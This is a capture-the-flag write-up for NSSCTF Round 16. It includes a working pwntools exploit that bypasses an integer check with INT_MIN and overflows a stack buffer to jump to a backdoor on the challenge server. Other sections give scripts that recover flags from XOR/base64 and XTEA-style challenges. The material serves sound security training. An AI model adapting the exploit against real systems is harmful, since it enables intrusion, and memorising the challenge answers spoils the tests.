nyyyddddn

nssctfr16_wp

2024/01/26

pwn

nc_pwnre

一个异或的逻辑, 异或后是一串base64编码,提交解码后的文本就进到shell了

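# Obfuscated bytes from the challenge: each one is a base64 character XORed with 0x10.
# A fixed single-byte XOR over an embedded secret is reversible by anyone who holds the binary.
a = [0x44,0x7c,0x5e,0x44,0x41,0x21,0x42,0x57,0x75,0x21,0x74,0x56,0x44,0x57,0x5d,0x67,0x44,0x46,0x29,0x45,0x5d,0x56,0x29,0x67,0x46,0x22,0x25,0x76,0x74,0x6a,0x52,0x69,0x5d,0x47,0x41,0x78,0x76,0x41,0x2d,0x2d]

# Undo the XOR. The result is still base64 text, so it has to be base64-decoded
# before it is submitted to the service.
decoded = "".join(chr(i ^ 0x10) for i in a)
print(decoded, end="")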
TlNTQ1RGe1dFTGMwTV9UMF9wV25fdzByMWQhfQ==

1705130191002

ret_text

// Decompiler output: v2 is read as a signed decimal integer from the user.
__isoc99_scanf("%d", &v2);
// The condition holds only when v2 is negative and is still negative after being negated.
// -2147483648 (INT_MIN) is the value the writeup uses: its negation does not fit in a signed 32-bit int.
// Signed overflow on negation is undefined behaviour in C; rejecting INT_MIN (or any out-of-range value)
// before negating removes this path.
if ( v2 < 0 && (v2 = -v2, v2 < 0) )

对 -2147483648(INT_MIN)取负会溢出,结果仍然是 -2147483648,所以取负之后 v2 依旧小于 0,满足这个 if 的约束,能走到下面的 read。read 那里有一个栈溢出,把返回地址覆盖为 backdoor 就好了。

from pwn import *
from LibcSearcher import *

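# Global pwntools settings, then load the challenge binary.
# NOTE(review): assigning context.binary re-derives the architecture from the ELF itself,
# so the arch='amd64' given here is replaced if the file is 32-bit; the p32() packing used
# later in this script suggests a 32-bit target — confirm.
context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./ret_text_v0')
libc = elf.libc

# 0 = connect to the remote instance, non-zero = run the local binary.
is_debug = 0

# The page lost the indentation of both branches; it is restored here so the script parses.
if is_debug:
    p = process()
else:
    ip = "node7.anna.nssctf.cn"
    port = 28070
    p = remote(ip, port)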

# Debugger shortcut; the direct form would be gdb.attach(p).
def g(x):
    """Attach gdb to the given process."""
    return gdb.attach(x)


# Thin wrappers over the tube `p`: send() sendline() sendafter() sendlineafter()
def s(x):
    """Send x without a trailing newline."""
    return p.send(x)


def sl(x):
    """Send x followed by a newline."""
    return p.sendline(x)


def sa(x, y):
    """Wait until x has been received, then send y."""
    return p.sendafter(x, y)


def sla(x, y):
    """Wait until x has been received, then send y followed by a newline."""
    return p.sendlineafter(x, y)


# Thin wrappers over the tube `p`: recv() recvline() recvuntil()
def r(x=None):
    """Receive whatever is available, or pass x through to recv() when it is given."""
    if x is None:
        return p.recv()
    return p.recv(x)


def rl():
    """Receive one line."""
    return p.recvline()


def ru(x):
    """Receive until x has been seen."""
    return p.recvuntil(x)


def r_leek_libc_64():
    """Read up to a 0x7f byte, keep the last six bytes, zero-pad to eight and unpack with u64."""
    tail = p.recvuntil(b'\x7f')[-6:]
    return u64(tail.ljust(8, b'\x00'))


def r_leek_libc_32():
    """Read up to a 0xf7 byte and unpack the last four bytes with u32."""
    tail = p.recvuntil(b'\xf7')[-4:]
    return u32(tail)



# Stage 1: answer the integer prompt with INT_MIN. The binary's check negates a negative
# input and expects it to remain negative, which only this value satisfies.
payload = "-2147483648"
p.sendlineafter("Easy ret2text!!!Input:\n", payload)

# Stage 2: the read() that follows accepts more bytes than the stack buffer holds.
# 0x20 + 0x4 filler bytes come first — presumably the buffer plus the saved frame pointer;
# confirm against the disassembly — followed by the address the author uses for the
# backdoor function as the new return address.
# Root cause for a fix: reject INT_MIN explicitly and bound the read to the buffer size.
filler = b'a' * (0x20 + 0x4)
payload = filler + p32(0x8049328)
p.sendlineafter("OK!!!You are right.\n", payload)

# Hand the connection over to the terminal.
p.interactive()

re

test your Debugger

打个断点去内存里面看一下flag就好了

CompileMe!!!

一眼看出是 XTEA。尝试编译了一下,发现内存爆了,VS 崩溃了。跟了一下 new ZZZ() 这个操作,发现爆内存的原因是调用栈上的栈帧太多了。自己写一个 class ZZZ,再写一个 GetVal 方法,直接把 val 计算出来就好了。

// Challenge source as quoted by the writeup: an XTEA-style decryption in which every local
// is named by a run of underscores. ZZZ is not defined in this excerpt.
internal class Program
{
// Decrypts the embedded ciphertext, passes each resulting 64-bit word through
// new ZZZ(word).GetVal(), and writes the bytes to the console as ASCII.
static void Main(string[] args)
{
// Key: four 64-bit words; read as ASCII they spell "Welcome to NSSCTF Round#16 Basic".
var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
// Ciphertext: eight 64-bit words, processed below as four (first, second) pairs.
var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
// 0x9E3779B9 is the delta constant of TEA/XTEA.
const ulong ___ = 0x9E3779B9;
// 32 entries; the element values are never read, the array only drives 32 ForEach iterations below.
var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();

// Tag every ciphertext word with its index, group by index / 2 to form pairs, decrypt each pair.
var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
.GroupBy(____________ => ____________.Index / 2)
.Select(___________ =>
{
// First word of the pair, second word of the pair, and the running sum starting at delta * 32.
ulong _________ = ___________.ElementAt(0).Value;
ulong __________ = ___________.ElementAt(1).Value;
ulong _____________ = ___ * 32;

// One decryption round per iteration. The words are ulong, so the arithmetic is 64-bit
// rather than the 32-bit words of textbook XTEA.
____.ToList().ForEach(_____________________ =>
{
// Order matters: update the second word, step the sum down by delta, then update the first word.
__________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
_____________ -= ___;
_________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
});
return new[] { _________, __________ };
})
// Flatten the decrypted pairs back into one array of words.
.SelectMany(______________ => ______________)
.ToArray();

// Overwrite the ciphertext array with the decrypted words.
Array.Copy(_____, __, __.Length);

// For each word: run it through ZZZ.GetVal(), take the 8 bytes in reversed BitConverter order,
// and write each byte as one ASCII character.
__.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
//Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
//Try to compile me!!!
}
}

一些文本处理的代码

# import re

# code = """
# //NET8.0
#
#
# namespace NSSCTF
# {
# internal class Program
# {
# static void Main(string[] args)
# {
# var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
# var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
# const ulong ___ = 0x9E3779B9;
# var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();
#
# var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
# .GroupBy(____________ => ____________.Index / 2)
# .Select(___________ =>
# {
# ulong _________ = ___________.ElementAt(0).Value;
# ulong __________ = ___________.ElementAt(1).Value;
# ulong _____________ = ___ * 32;
#
# ____.ToList().ForEach(_____________________ =>
# {
# __________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
# _____________ -= ___;
# _________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
# });
# return new[] { _________, __________ };
# })
# .SelectMany(______________ => ______________)
# .ToArray();
#
# Array.Copy(_____, __, __.Length);
#
# __.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
# //Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
# //Try to compile me!!!
# .......
# }
# }
#
# abstract class _(ulong val)
# {
# public abstract ulong GetVal();
# }
#
# class A(ulong val) : _(val)
# {
# public override ulong GetVal()
# {
# return val + 0x79013C0BD7467DC;
# }
# }
#
# class B(ulong val) : A(val)
# {
# public override ulong GetVal()
# {
# base.GetVal();
# return val - 0x78D23D50E23FC98;
# }
# }
#
# class C(ulong val) : B(val)
# {
# """
# regex = r"return\s+val\s+([+-^])\s+(0x[a-fA-F0-9]+);"

# matches = re.findall(regex, code)
#
# for i in matches:
# print(i)
#


# data = """
# + 0x79013C0BD7467DC
# - 0x78D23D50E23FC98
# ^ 0x7E83D35728928CB
# - 0x4901E49CF9D63E8
# ^ 0x664DCA766EBA177
# + 0x7532EA705E8D596
# - 0x703A7337269BDED
# ^ 0x6FD783765C32290
# - 0x5A443D7480A09F7
#
#......
# """
#
# processed_data = ""
# for line in data.strip().split('\n'):
# operator, number = line.split(' ')
# processed_line = f"value {operator}= {number};\n"
# print(" " + processed_line)

执行后得到flag

using System.Reflection.Metadata.Ecma335;
using System.Text;
namespace NSSCTF
{
internal class Program
{
    /// <summary>
    /// Decrypts the embedded ciphertext with an XTEA-style routine over 64-bit words,
    /// feeds every decrypted word through <c>ZZZ.GetVal()</c>, and prints the result as ASCII.
    /// </summary>
    /// <param name="args">Unused.</param>
    static void Main(string[] args)
    {
        // Key: four 64-bit words; read as ASCII they spell "Welcome to NSSCTF Round#16 Basic".
        ulong[] key = { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
        // Ciphertext: eight 64-bit words, i.e. four (v0, v1) pairs.
        ulong[] words = { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
        // TEA/XTEA delta constant.
        const ulong delta = 0x9E3779B9;
        // Only the length (32) of this array is used: it fixes the number of rounds.
        ulong[] roundSchedule = Enumerable.Range(0, 32).Select(i => delta * (32 - (uint)i)).ToArray();

        ulong[] decrypted = words
            .Chunk(2)
            .SelectMany(pair =>
            {
                ulong v0 = pair[0];
                ulong v1 = pair[1];
                ulong sum = delta * 32;

                for (int round = 0; round < roundSchedule.Length; round++)
                {
                    // Decryption order: v1 first, then step the sum down, then v0.
                    v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
                    sum -= delta;
                    v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
                }

                return new[] { v0, v1 };
            })
            .ToArray();

        // The decrypted words replace the ciphertext in place.
        Array.Copy(decrypted, words, words.Length);

        // Every word goes through ZZZ.GetVal(); its bytes are emitted in reversed
        // BitConverter order, one ASCII character per byte.
        var outputBytes = words
            .SelectMany(word => Enumerable.Reverse(BitConverter.GetBytes(new ZZZ(word).GetVal())))
            .ToList();
        foreach (byte b in outputBytes)
        {
            Console.Write(Encoding.ASCII.GetString(new[] { b }));
        }
        //Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
        //Try to compile me!!!
    }
}
// Flattened stand-in for the challenge's ZZZ type: instead of a long inheritance chain with one
// GetVal() override per class, every extracted operation is applied in a single method.
// NOTE(review): the class excerpt quoted earlier on this page shows B.GetVal() calling
// base.GetVal() without using its result; this version accumulates every step instead —
// confirm against the full challenge source.
class ZZZ(ulong val)
{
// Working copy of the constructor argument. GetVal() mutates it, so a second call on the
// same instance would start from the already-transformed value.
ulong value = val;
// Applies the +=, -= and ^= steps in the order they were extracted from the challenge classes.
public ulong GetVal()
{
value += 0x79013C0BD7467DC;

value -= 0x78D23D50E23FC98;

value ^= 0x7E83D35728928CB;

value -= 0x4901E49CF9D63E8;

value ^= 0x664DCA766EBA177;

value += 0x7532EA705E8D596;

value -= 0x703A7337269BDED;
// The writeup elides the remaining steps at this point. The dots are not valid C#, and the
// method needs a final `return value;` before it will compile.
......
}
}
}